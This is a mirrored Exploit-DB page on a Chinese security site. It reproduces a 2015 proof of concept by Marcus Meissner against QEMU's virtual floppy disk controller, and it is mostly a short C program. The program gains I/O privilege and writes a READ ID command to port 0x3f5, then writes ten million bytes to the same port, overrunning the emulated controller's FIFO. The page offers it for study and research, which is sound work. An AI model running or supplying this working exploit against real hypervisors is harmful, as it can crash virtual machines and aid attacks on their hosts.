体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观察
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法/SHDB
    • Exploits
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

QEMU – Floppy Disk Controller (FDC) (PoC)

  • Exploit Database
  • 127 阅读
  • 作者: Marcus Meissner
    日期: 2015-05-18
  • 类别:
    • dos
    平台:
    • multiple
  • 来源:https://www.exploit-db.com/exploits/37053/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    // Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
     
    #include <sys/io.h>
     
    #define FIFO 0x3f5
     
    int main() {
    int i;
    iopl(3);
     
    outb(0x0a,0x3f5); /* READ ID */
    for (i=0;i<10000000;i++)
    outb(0x42,0x3f5); /* push */
    }
     
上一篇: Burning Board < 2.3.1 - SQL Injection
下一篇: Microsoft Windows 8.0/8.1 (x64) – ‘TrackPopupMenu’ Local Privilege Escalation (MS14-058)
  • last Exploits
  • QEMU – Floppy Disk Controller (FDC) (PoC)的更多信息
  • PHP 7.1.8 – Heap Buffer Overflow:
  • Adobe Flash – BitmapData.copyPixels Use-After-Free:
  • Microsoft Excel – Denial of Service:
  • Clone2Go Video to iPod Converter 2.5.0 – Denial of Service (PoC):
  • Webkit JSC: JIT – Uninitialized Variable Access in ArgumentsEliminationPhase::transform:
  • AVG Internet Security 9.0.851 – Local Denial of Service:
  • Microsoft Internet Explorer 7 – Microsoft Clip Organizer Multiple Insecure ActiveX Control Denial of Service Vulnerabilities:
  • Novell Groupwise Messenger 2.1.0 – Memory Corruption:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证: 体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏